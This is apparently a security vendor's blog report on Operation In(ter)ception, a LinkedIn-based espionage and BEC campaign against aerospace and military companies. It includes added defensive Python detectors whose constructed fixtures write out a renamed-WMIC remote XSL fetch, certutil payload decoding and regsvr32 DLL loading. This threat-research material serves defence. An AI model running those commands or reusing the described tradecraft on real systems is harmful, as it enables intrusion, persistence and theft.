At the end of last year, we discovered targeted attacks against aerospace and military companies in Europe and the Middle East, active from September to December 2019. A collaborative investigation with two of the affected European companies allowed us to gain insight into the operation and uncover previously undocumented malware.

This blogpost will shed light on how the attacks unfolded. The full research can be found in our white paper, Operation In(ter)ception: Targeted attacks against European aerospace and military companies.

The attacks, which we dubbed Operation In(ter)ception based on a related malware sample named Inception.dll, were highly targeted and clearly intent on staying under the radar.

To compromise their targets, the attackers used social engineering via LinkedIn, hiding behind the ruse of attractive, but bogus, job offers. Having established an initial foothold, the attackers deployed their custom, multistage malware, along with modified open-source tools. Besides malware, the adversaries made use of living off the land tactics, abusing legitimate tools and OS functions. Several techniques were used to avoid detection, including code signing, regular malware recompilation and impersonating legitimate software and companies.

According to our investigation, the primary goal of the operation was espionage. However, in one of the cases we investigated, the attackers attempted to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.

While we did not find strong evidence connecting the attacks to a known threat actor, we discovered several hints suggesting a possible link to the Lazarus group, including similarities in targeting, development environment, and anti-analysis techniques used.

Initial compromise

As part of the initial compromise phase, the Operation In(ter)ception attackers had created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries. In our investigation, we’ve seen profiles impersonating Collins Aerospace (formerly Rockwell Collins) and General Dynamics, both major US corporations in the field.

With the profiles set up, the attackers sought out employees of the targeted companies and messaged them with fictitious job offers using LinkedIn’s messaging feature, as seen in Figure 1. (Note: The fake LinkedIn accounts no longer exist.)

Figure 1. A fake job offer sent via LinkedIn to employees at one of the targeted companies

Once the attackers had the targets’ attention, they snuck malicious files into the conversation, disguised as documents related to the job offer in question. Figure 2 shows an example of such a communication.

Figure 2. Communication between the attackers and an employee at one of the targeted companies

To send the malicious files, the attackers either used LinkedIn directly, or a combination of email and OneDrive. For the latter option, the attackers used fake email accounts corresponding with their fake LinkedIn personas, and included OneDrive links hosting the files.

The shared file was a password-protected RAR archive containing a LNK file. When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.

That PDF, seemingly containing salary information for the purported job positions, in reality served as a decoy; in the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.

This enabled the attackers to get their initial foothold inside the targeted company and gain persistence on the compromised computer. Figure 3 illustrates the steps leading up to compromise.

Figure 3. Attack scenario from initial contact to compromise
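The persistence artifact described above (a scheduled task that periodically runs a relocated copy of WMIC against a remote XSL script) is something a responder can triage directly from exported task definitions. The following is an added example written for this post; it is not ESET's tooling and not code recovered from the attackers. It assumes the XML format produced by Task Scheduler exports and a standard 64-bit Windows directory layout, and the two task definitions, folder names and URL in it are constructed placeholders rather than indicators from the investigation.

```python
"""Triage exported Task Scheduler XML for beaconing-style persistence: an action
that runs a binary from a non-standard folder, arguments that reference a remote
resource, and a short repetition interval. Added example, not ESET's tooling."""
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler's exported task definitions.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumption: a standard 64-bit Windows layout; adjust for your estate.
TRUSTED_DIRS = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",
    r"c:\program files (x86)",
)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# ISO 8601 duration as used in <Repetition><Interval>, e.g. PT10M or P1DT2H.
DURATION_RE = re.compile(r"^P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$")


def _interval_minutes(iso_duration: str):
    """Convert an ISO 8601 duration such as PT10M to minutes (None if unparsable)."""
    m = DURATION_RE.match(iso_duration.strip())
    if not m:
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def _in_trusted_dir(command: str) -> bool:
    path = command.strip('"').lower()
    return any(path.startswith(d + "\\") for d in TRUSTED_DIRS)


def analyse_task(xml_text: str) -> dict:
    """Return the findings for one task definition plus a simple count-based score."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = (exec_node.findtext("t:Command", "", TASK_NS) or "").strip()
        args = (exec_node.findtext("t:Arguments", "", TASK_NS) or "").strip()
        if command and not _in_trusted_dir(command):
            findings.append(f"non-standard binary location: {command}")
        if URL_RE.search(args):
            findings.append(f"remote resource in arguments: {args}")
    for interval in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
        minutes = _interval_minutes(interval.text or "")
        if minutes is not None and minutes <= 15:
            findings.append(f"short repetition interval: {interval.text}")
    return {"findings": findings, "score": len(findings)}


def is_suspicious(xml_text: str) -> bool:
    """A remote resource in the action plus at least one more indicator."""
    result = analyse_task(xml_text)
    has_remote = any(f.startswith("remote resource") for f in result["findings"])
    return has_remote and result["score"] >= 2


# Constructed sample: a task resembling the pattern on this page. The folder,
# file name and URL are placeholders, not indicators from the investigation.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2019-10-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Intel\IntelUpdate.exe</Command>
      <Arguments>/format:"https://placeholder.invalid/status.xsl"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison: a built-in utility, no remote input.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2019-10-01T03:00:00</StartBoundary>
      <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\defrag.exe</Command>
      <Arguments>-c -h -o</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, task in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, is_suspicious(task), analyse_task(task)["findings"])
```

Exported definitions of this shape can be collected with `schtasks /query /xml` or read from the task files under the Tasks folder; the score threshold is deliberately simple and should be tuned against the tasks that are normal in your environment.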

Attacker tools and techniques

The Operation In(ter)ception attackers employed a number of malicious tools, including custom, multistage malware, and modified versions of open-source tools.

We have seen the following components:

  • Custom downloader (Stage 1)
  • Custom backdoor (Stage 2)
  • A modified version of PowerShdll – a tool for running PowerShell code without the use of powershell.exe
  • Custom DLL loaders used for executing the custom malware
  • Beacon DLL, likely used for verifying connections to remote servers
  • A custom build of dbxcli – an open-source, command-line client for Dropbox; used for data exfiltration

Under a typical scenario, the Stage 1 malware – the custom downloader – was downloaded by the remote XSL script (described in the Initial compromise section) and executed using the rundll32 utility. However, we also saw instances where the attackers used one of their custom DLL loaders to run the Stage 1 malware. The main purpose of the custom downloader is to download the Stage 2 payload and run it in memory.

The Stage 2 payload is a modular backdoor in the form of a DLL written in C++. It periodically sends requests to the server and performs defined actions based on the received commands, such as sending basic information about the computer, loading a module, or changing the configuration. While we didn’t recover any modules received by the backdoor from its C&C server, we did find indications that a module was used to download PowerShdll.

Besides malware, the adversaries leveraged living off the land tactics, abusing legitimate tools and OS functions to perform various malicious operations, in an attempt to fly under the radar. As for specific techniques, we found that the attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware.

Figure 4 shows how the various components interacted during the malware’s execution.

Figure 4. Malware execution flow

Besides the living off the land techniques, we found that the attackers made a special effort to remain undetected.

First, the attackers disguised their files and folders by giving them legitimate-sounding names. For this purpose, the attackers misused the names of known software and companies, such as Intel, NVidia, Skype, OneDrive and Mozilla. For example, we found malicious files with the following paths:

  • C:\ProgramData\DellTPad\DellTPadRepair.exe
  • C:\Intel\IntelV.cgi

Interestingly, it was not just malicious files that were renamed – the attackers also manipulated the abused Windows utilities. They copied the utilities to a new folder (e.g. C:\NVIDIA) and renamed them (e.g. regsvr32.exe was renamed to NvDaemon.exe).
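The living off the land techniques listed above (WMIC interpreting remote XSL scripts, certutil decoding base64 payloads, rundll32 and regsvr32 running malware components) and the renamed, relocated utilities described in this section leave a consistent trail in process-creation telemetry. The following detection logic is an added example for this post, not ESET's tooling; it assumes Sysmon-style process-creation events carrying Image, OriginalFileName and CommandLine fields (OriginalFileName is read from the PE version resource, so a renamed copy of a utility still reports its original name), a standard 64-bit Windows layout, and the sample events, paths and URL are constructed placeholders.

```python
"""Process-creation rules for renamed system utilities and the living-off-the-
land command lines described on this page. Added example, not ESET's tooling."""
import re
from pathlib import PureWindowsPath

# Utilities the page reports being copied, renamed and abused. OriginalFileName
# comes from the PE version resource, so a renamed copy still carries it.
LOLBINS = {"wmic.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}

# Assumption: standard 64-bit Windows layout.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files", r"c:\program files (x86)")

REMOTE_XSL_RE = re.compile(r'/format:\s*"?https?://', re.IGNORECASE)
DECODE_RE = re.compile(r"(?:^|\s)[-/]decode(?:\s|$)", re.IGNORECASE)
DLL_PATH_RE = re.compile(r'([a-z]:\\[^\s"]+\.dll)', re.IGNORECASE)


def _trusted(path: str) -> bool:
    return any(path.lower().startswith(d + "\\") for d in TRUSTED_DIRS)


def classify(event: dict) -> list:
    """Return the detection tags that apply to one process-creation event."""
    image = event.get("Image", "")
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    image_name = PureWindowsPath(image).name.lower()
    tags = []

    # Masquerading: a known utility running under a different file name or
    # from a folder where the OS does not ship it.
    if original in LOLBINS:
        if image_name != original:
            tags.append("renamed_system_utility")
        if not _trusted(image):
            tags.append("system_utility_outside_trusted_dir")

    # WMIC told to fetch a remote XSL stylesheet (T1220).
    if original == "wmic.exe" and REMOTE_XSL_RE.search(cmdline):
        tags.append("wmic_remote_xsl")

    # certutil used to decode a base64 payload (T1140).
    if original == "certutil.exe" and DECODE_RE.search(cmdline):
        tags.append("certutil_decode")

    # rundll32/regsvr32 loading a DLL that lives outside trusted folders.
    if original in {"rundll32.exe", "regsvr32.exe"}:
        for dll in DLL_PATH_RE.findall(cmdline):
            if not _trusted(dll):
                tags.append("dll_loaded_from_untrusted_dir")
                break
    return tags


def triage(events: list) -> list:
    """Return (index, tags) for every event that triggered at least one rule."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits


# Constructed sample telemetry (placeholders, not real indicators).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic os get caption"},
    {"Image": r"C:\Intel\IntelUpdate.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": r'IntelUpdate.exe /format:"https://placeholder.invalid/status.xsl"'},
    {"Image": r"C:\NVIDIA\NvDaemon.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"NvDaemon.exe /s C:\ProgramData\DellTPad\helper.dll"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\update.txt C:\Users\Public\update.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for index, tags in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["Image"], tags)
```

The first and last sample events are the benign baseline (the genuine WMIC and rundll32 binaries doing ordinary work) and produce no tags; the renamed copies are caught by the OriginalFileName mismatch regardless of what the attackers called the file or which folder they chose.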

Second, the attackers digitally signed some components of their malware, namely the custom downloader and backdoor, and the dbxcli tool. The certificate was issued in October 2019 – while the attacks were active – to 16:20 Software, LLC. According to our research, 16:20 Software, LLC is an existing company based in Pennsylvania, USA, incorporated in May 2010.

Third, we found that the Stage 1 malware was recompiled multiple times throughout the operation.

Finally, the attackers also implemented anti-analysis techniques in their custom malware, such as control-flow flattening and dynamic API loading.

Data gathering and exfiltration

According to our research, the attackers used a custom build of dbxcli, an open-source command-line client for Dropbox, to exfiltrate data gathered from their targets. Unfortunately, neither the malware analysis nor the investigation allowed us to gain insight into what files the Operation In(ter)ception attackers were after. However, the job titles of the employees targeted via LinkedIn suggest that the attackers were interested in technical and business-related information.

Business email compromise

In one of the investigated cases, the attackers didn’t just stop at data exfiltration – as a final stage of the operation, they attempted to monetize the access to a victim’s email account through a BEC attack.

First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account, as seen in Figure 5. For further communication with the customer, they used their own email address mimicking the victim’s.

Here, the attackers were unsuccessful – rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.

Figure 5. BEC email sent from a victim’s compromised email account
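The two moves described in this BEC attempt, continuing the thread from an address that mimics the victim's and pushing the customer toward a different bank account, combine into a simple mail-side check that the receiving party could have run. The following is an added example for this post, not ESET's tooling or anything recovered from the incident; it assumes the partner's legitimate domain is known in advance, and the partner domain, lookalike domain and messages in it are constructed.

```python
"""Screen an email thread for the BEC pattern described above: a lookalike of the
partner's domain as sender or Reply-To, plus payment-redirection language.
Added example, not ESET's tooling; all domains and messages are constructed."""
import re

# Common visual substitutions folded before comparing domains.
HOMOGLYPHS = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("cl", "d"))
PAYMENT_RE = re.compile(
    r"\b(new|updated|changed?)\b.{0,40}\b(bank|account|iban|payment details)\b",
    re.IGNORECASE | re.DOTALL,
)


def domain_of(address: str) -> str:
    """Lower-cased domain part of an address such as 'Name <user@host>'."""
    m = re.search(r"@([A-Za-z0-9.-]+)", address)
    return m.group(1).lower() if m else ""


def _fold(domain: str) -> str:
    for pair, repl in HOMOGLYPHS:
        domain = domain.replace(pair, repl)
    return domain


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (plain dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(domain: str, trusted: str) -> bool:
    """True if domain imitates trusted without being equal to it.

    The distance threshold of 2 suits domains of realistic length; tune it
    (or skip the distance test) for very short trusted domains.
    """
    if not domain or domain == trusted:
        return False
    return _fold(domain) == _fold(trusted) or edit_distance(domain, trusted) <= 2


def assess(message: dict, trusted_domain: str) -> list:
    """Return findings for one message (empty list = nothing noteworthy)."""
    findings = []
    sender = domain_of(message.get("from", ""))
    reply_to = domain_of(message.get("reply_to", ""))
    if is_lookalike(sender, trusted_domain):
        findings.append(f"sender domain imitates {trusted_domain}: {sender}")
    if reply_to and reply_to != sender:
        findings.append(f"Reply-To domain differs from sender: {reply_to}")
        if is_lookalike(reply_to, trusted_domain):
            findings.append(f"Reply-To domain imitates {trusted_domain}: {reply_to}")
    if PAYMENT_RE.search(message.get("body", "")):
        findings.append("payment-redirection language")
    return findings


def screen_thread(thread: list, trusted_domain: str) -> list:
    """Return (index, findings) for each message that raised something."""
    hits = []
    for i, message in enumerate(thread):
        findings = assess(message, trusted_domain)
        if findings:
            hits.append((i, findings))
    return hits


TRUSTED_DOMAIN = "aerocorp-example.com"  # constructed partner domain

# Constructed thread: a genuine invoice, then the takeover pattern.
SAMPLE_THREAD = [
    {"from": "Jane Doe <jane.doe@aerocorp-example.com>",
     "body": "Please find attached invoice 4711 for the Q3 deliveries."},
    {"from": "Jane Doe <jane.doe@aerocorp-example.com>",
     "reply_to": "jane.doe@aerocorp-exarnple.com",
     "body": "We have updated our bank account details. Please remit invoice 4711 to the new IBAN below."},
    {"from": "Jane Doe <jane.doe@aerocorp-exarnple.com>",
     "body": "Kindly confirm when the payment has been sent, this is urgent."},
    {"from": "Procurement <buyer@other-supplier.example>",
     "body": "Thanks, received."},
]

if __name__ == "__main__":
    for index, findings in screen_thread(SAMPLE_THREAD, TRUSTED_DOMAIN):
        print(index, findings)
```

The second message is the pivot point of the scheme: it still arrives from the genuinely compromised account, so only the Reply-To lookalike and the bank-detail change give it away, while later messages come straight from the imitation domain.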

Attribution hints

Although our investigation didn’t reveal compelling evidence tying the attacks to a known threat actor, we identified several hints suggesting a possible link with the Lazarus group. Notably, we found similarities in targeting, use of fake LinkedIn accounts, the development environment, and anti-analysis techniques used. Besides that, we have seen a variant of the Stage 1 malware that carried a sample of Win32/NukeSped.FX, which belongs to a malicious toolset that ESET attributes to the Lazarus group.

Conclusion

Our investigation uncovered a highly targeted operation notable for its compelling, LinkedIn-based social engineering scheme, custom modular malware and cunning detection evasion tricks. Interestingly, while Operation In(ter)ception showed all the signs of cyberespionage, the attackers apparently also had financial gain as a goal, as evidenced by the attempted BEC attack.

Special thanks to Michal Cebák for his work on this investigation.

For the full description of the attacks, as well as technical analysis of the previously undocumented malware and Indicators of Compromise (IoCs), please refer to our paper, Operation In(ter)ception: Targeted attacks against European aerospace and military companies.

IoCs collected from the attacks can also be found on the ESET GitHub repository.

MITRE ATT&CK techniques

Tactic | ID | Name | Description
Initial Access | T1194 | Spearphishing via Service | LinkedIn is used to contact the target and provide a malicious attachment.
Execution | T1059 | Command-Line Interface | cmd.exe used to create a scheduled task to interpret a malicious XSL script via WMIC.
Execution | T1106 | Execution through API | Malware uses CreateProcessA API to run another executable.
Execution | T1086 | PowerShell | A customized .NET DLL is used to interpret PowerShell commands.
Execution | T1117 | Regsvr32 | The regsvr32 utility is used to execute malware components.
Execution | T1085 | Rundll32 | The rundll32 utility is used to execute malware components.
Execution | T1053 | Scheduled Task | WMIC is scheduled to interpret remote XSL scripts.
Execution | T1047 | Windows Management Instrumentation | WMIC is abused to interpret remote XSL scripts.
Execution | T1035 | Service Execution | A service is created to execute the malware.
Execution | T1204 | User Execution | The attacker relies on the victim to extract and execute a LNK file from a RAR archive received in an email attachment.
Execution | T1220 | XSL Script Processing | WMIC is used to interpret remote XSL scripts.
Persistence | T1050 | New Service | A service is created to ensure persistence for the malware.
Persistence | T1053 | Scheduled Task | Upon execution of the LNK file, a scheduled task is created that periodically executes WMIC.
Defense Evasion | T1116 | Code Signing | Malware signed with a certificate issued for “16:20 Software, LLC”.
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | certutil.exe is used to decode base64-encoded malware binaries.
Defense Evasion | T1070 | Indicator Removal on Host | Attackers attempt to remove generated artifacts.
Defense Evasion | T1036 | Masquerading | Malware directories and files are named as, or similar to, legitimate software or companies.
Defense Evasion | T1027 | Obfuscated Files or Information | Malware is heavily obfuscated and delivered in base64-encoded form.
Defense Evasion | T1117 | Regsvr32 | The regsvr32 utility is used to execute malware components.
Defense Evasion | T1085 | Rundll32 | The rundll32 utility is used to execute malware components.
Defense Evasion | T1078 | Valid Accounts | Adversary uses compromised credentials to log into other systems.
Defense Evasion | T1220 | XSL Script Processing | WMIC is used to interpret remote XSL scripts.
Credential Access | T1110 | Brute Force | Adversary attempts to brute-force system accounts.
Discovery | T1087 | Account Discovery | Adversary queries AD server to obtain system accounts.
Discovery | T1012 | Query Registry | Malware has ability to query registry to obtain information such as Windows product name and CPU name.
Discovery | T1018 | Remote System Discovery | Adversary scans IP subnets to obtain list of other machines.
Discovery | T1082 | System Information Discovery | Malware has ability to gather information such as Windows product name, CPU name, username, etc.
Collection | T1005 | Data from Local System | Adversary collects sensitive data and attempts to upload it using the Dropbox CLI client.
Collection | T1114 | Email Collection | Adversary has access to a victim’s email and may utilize it for a business email compromise attack.
Command and Control | T1071 | Standard Application Layer Protocol | Malware uses HTTPS protocol.
Exfiltration | T1002 | Data Compressed | Exfiltrated data is compressed by RAR.
Exfiltration | T1048 | Exfiltration Over Alternative Protocol | Exfiltrated data is uploaded to Dropbox using its CLI client.
Exfiltration | T1537 | Transfer Data to Cloud Account | Exfiltrated data is uploaded to Dropbox.